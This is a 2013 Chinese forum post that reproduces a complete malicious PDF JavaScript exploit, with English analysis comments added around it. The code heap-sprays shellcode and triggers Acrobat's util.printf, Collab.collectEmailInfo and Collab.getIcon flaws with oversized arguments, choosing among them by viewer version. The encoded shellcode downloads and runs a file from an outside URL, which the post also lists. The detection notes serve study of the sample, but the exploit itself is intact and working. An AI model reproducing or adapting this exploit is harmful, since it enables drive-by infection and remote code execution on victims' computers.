
[已鉴定] http://sn14.zz.mu/pdf.php【Exploit BY哀酱】

哀酱俏佳人
发表于 2013-6-9 17:10:26 | 显示全部楼层 |阅读模式
  /**
   * Filler-string helper used by collab_email() and collab_geticon() below.
   * Doubles `yarsp` until twice its length reaches `len`, then truncates it
   * to len / 2 characters.
   *
   * @param {string} yarsp - seed string; both callers pass unescape("%u9090%u9090").
   * @param {number} len - target size; the callers derive it from
   *   shellcode.length * 2, so it is presumably a byte count and the / 2
   *   converts it to 16-bit string units (confirm against the callers).
   * @returns {string} the padded and truncated filler.
   *
   * Analysis note: the helper is harmless by itself; it matters because it
   * sizes the padding placed in front of the payload in every sprayed string.
   */
  1. function fix_it(yarsp, len){
  2.   while (yarsp.length * 2 < len){
  3.     yarsp += yarsp;
  4.   }
  5.   yarsp = yarsp.substring(0, len / 2);
  6.   return yarsp;
  7. }
  // Malware-sample routine, kept verbatim for analysis. It fills the heap
  // with many copies of a filler + payload string and then calls the Acrobat
  // JavaScript API util.printf with an extreme field width. The page gives
  // no CVE id for this call, so none is asserted here.
  // Detection: inside PDF JavaScript, flag unescape() over long %uXXXX runs,
  // loops that store hundreds of large identical strings, and util.printf
  // calls whose format string carries a very large width.
  // Mitigation: keep the PDF viewer patched and disable JavaScript in the
  // viewer where it is not needed.
  8. function util_printf(){
     // `payload` is a run of %u-escaped 16-bit units; unescape() turns each
     // into one string character (two bytes, low byte first in memory).
     // Read that way, the final units spell the ASCII URL
     // http://sn14.zz.mu//load.php?spl=pdf_exp (the same URL the post lists
     // under the script), and the body contains the byte sequences "urlm",
     // "on.d" and "e.ex". That is consistent with a download-and-execute
     // stage, but it has not been confirmed by disassembly here.
  9.   var payload = unescape("
  10. %uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C
  11. %u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3
  12. %u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB
  13. %u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3
  14. %u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698
  15. %uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033
  16. %u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98
  17. %u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u316E%u2E34%u7A7A%u6D2E
  18. %u2F75%u6C2F%u616F%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070");
     // Filler of repeated 0x0A0A units is placed in front of the payload.
  19.   var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
  20.   var heapblock = nop + payload;
  21.   var bigblock = unescape("%u0A0A%u0A0A");
  22.   var headersize = 20;
  23.   var spray = headersize + heapblock.length;
     // Grow the 0x0A0A filler by doubling until it is at least `spray`
     // characters long, then cut the two pieces used to build `block`.
  24.   while (bigblock.length < spray){
  25.     bigblock += bigblock;
  26.   }
  27.   var fillblock = bigblock.substring(0, spray);
  28.   var block = bigblock.substring(0, bigblock.length - spray);
     // Enlarge `block` until block.length + spray reaches 0x40000 characters.
  29.   while (block.length + spray < 0x40000){
  30.     block = block + block + fillblock;
  31.   }
     // 1400 array slots each hold filler followed by the payload: the
     // repeated large allocation is the memory-pressure signature to look
     // for in a sandbox or memory trace.
  32.   var mem_array = new Array();
  33.   for (var i = 0; i < 1400; i ++ ){
  34.     mem_array[i] = block + heapblock;
  35.   }
     // `num` is an oversized numeric literal; together with the "%45000f"
     // format below it forms the call this routine exists to make.
  36.   var num =
  37. 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
  38. 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
  39. 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
  40. 88888888888888888888888888;
  41.   util.printf("%45000f", num);
  42. }
  // Malware-sample routine, kept verbatim for analysis. It stores many
  // filler + payload strings in an array and then passes a very long `msg`
  // value to the Acrobat JavaScript API Collab.collectEmailInfo.
  // Detection: a Collab.collectEmailInfo call whose subj/msg argument is
  // tens of thousands of characters of one repeated unit has no legitimate
  // use in a document script.
  43. function collab_email(){
     // Same %u-escaped unit sequence as the payload in util_printf(); its
     // final units spell http://sn14.zz.mu//load.php?spl=pdf_exp when read
     // as little-endian byte pairs.
  44.   var shellcode = unescape("
  45. %uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C
  46. %u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3
  47. %u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB
  48. %u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3
  49. %u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698
  50. %uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033
  51. %u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98
  52. %u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u316E%u2E34%u7A7A%u6D2E
  53. %u2F75%u6C2F%u616F%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070");
  54.   var mem_array = new Array();
  55.   var cc = 0x0c0c0c0c;
  56.   var addr = 0x400000;
     // sc_len doubles the character count (two bytes per 16-bit unit);
     // `len` is what is left of 0x400000 after the payload and 0x38.
  57.   var sc_len = shellcode.length * 2;
  58.   var len = addr - (sc_len + 0x38);
     // Filler of 0x9090 units, sized by fix_it() to len / 2 characters.
  59.   var yarsp = unescape("%u9090%u9090");
  60.   yarsp = fix_it(yarsp, len);
     // (0x0c0c0c0c - 0x400000) / 0x400000 is about 47.19, so the loop
     // below runs 48 times, each time storing filler + payload.
  61.   var count2 = (cc - 0x400000) / addr;
  62.   for (var count = 0; count < count2; count ++ ){
  63.     mem_array[count] = yarsp + shellcode;
  64.   }
     // Build a string of repeated 0x0c0c units at least 44952 characters
     // long by doubling; it becomes the `msg` field of the API call.
  65.   var overflow = unescape("%u0c0c%u0c0c");
  66.   while (overflow.length < 44952){
  67.     overflow += overflow;
  68.   }
  69.   this .collabStore = Collab.collectEmailInfo({
  70.     subj : "", msg : overflow
  71.   }
  72.   );
  73. }
  // Malware-sample routine, kept verbatim for analysis. Structurally the
  // same as collab_email() but with randomised local names: it stores
  // filler + payload strings in an array and then passes an over-long name
  // to the Acrobat JavaScript API Collab.getIcon.
  // Detection: the random identifiers (vvpethya, hWq500CN, ...) are not
  // stable indicators; key on the Collab.getIcon call with a multi-kilobyte
  // argument and on the unescape() of long %uXXXX runs.
  74. function collab_geticon(){
       // Runs only when the viewer exposes app.doc.Collab.getIcon.
  75.   if (app.doc.Collab.getIcon){
  76.     var arry = new Array();
       // Same %u-escaped unit sequence as in the two routines above; its
       // final units spell http://sn14.zz.mu//load.php?spl=pdf_exp.
  77.     var vvpethya = unescape("
  78. %uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C
  79. %u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3
  80. %u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB
  81. %u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3
  82. %u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698
  83. %uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033
  84. %u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98
  85. %u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u316E%u2E34%u7A7A%u6D2E
  86. %u2F75%u6C2F%u616F%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070");
       // Payload size doubled (two bytes per unit), then subtracted together
       // with 0x38 from 0x400000 to size the 0x9090 filler.
  87.     var hWq500CN = vvpethya.length * 2;
  88.     var len = 0x400000 - (hWq500CN + 0x38);
  89.     var yarsp = unescape("%u9090%u9090");
  90.     yarsp = fix_it(yarsp, len);
       // Same bound as in collab_email(): about 47.19, i.e. 48 iterations.
  91.     var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
  92.     for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
  93.       arry[vqcQD96y] = yarsp + vvpethya;
  94.     }
       // A single tab character ("%09") is doubled until the string is at
       // least 0x4000 characters, then prefixed with "N." and handed to
       // Collab.getIcon as the icon name.
  95.     var tUMhNbGw = unescape("%09");
  96.     while (tUMhNbGw.length < 0x4000){
  97.       tUMhNbGw += tUMhNbGw;
  98.     }
  99.     tUMhNbGw = "N." + tUMhNbGw;
  100.     app.doc.Collab.getIcon(tUMhNbGw);
  101.   }
  102. }
  // Dispatcher of the sample: reads the viewer version and decides which of
  // the three routines above to call. The three `if` statements are
  // independent (no `else`), so more than one routine can run in one pass.
  // Triage note: the gate works on single digits only and its conditions are
  // loose (see below), so the API calls may be attempted on viewers outside
  // the apparently intended range; whether they have any effect depends on
  // the viewer's patch level. Do not use the version gate alone to decide
  // whether a host was exposed.
  103. function PPPDDDFF(){
     // Strip every non-digit from app.viewerVersion and keep the first three
     // digits as one-character strings; a two-digit major version is
     // therefore read as two separate digits.
  104.   var version = app.viewerVersion.toString();
  105.   version = version.replace(/\D/g, '');
  106.   var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));
     // && binds tighter than ||: this is true for digits 8,0,* and also for
     // any first digit when the second digit is 1 and the third is below 3.
     // The == and < comparisons rely on string-to-number coercion.
  107.   if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 &&
  108.   varsion_array[2] < 3)){
  109.     util_printf();
  110.   }
     // First digit below 8, or 8 with second and third digits both below 2.
  111.   if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 &&
  112.   varsion_array[2] < 2)){
  113.     collab_email();
  114.   }
     // First digit below 9, or 9 with second digit below 1.
  115.   if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)){
  116.     collab_geticon();
  117.   }
  118. }
  // The dispatcher is called as soon as the script is evaluated; the listing
  // shows no user action or other condition around this call.
  119. PPPDDDFF();
  1. http://sn14.zz.mu//load.php?spl=pdf_exp
王子带着刀
发表于 2013-6-9 21:43:02 | 显示全部楼层
QQ截图20130609214457.png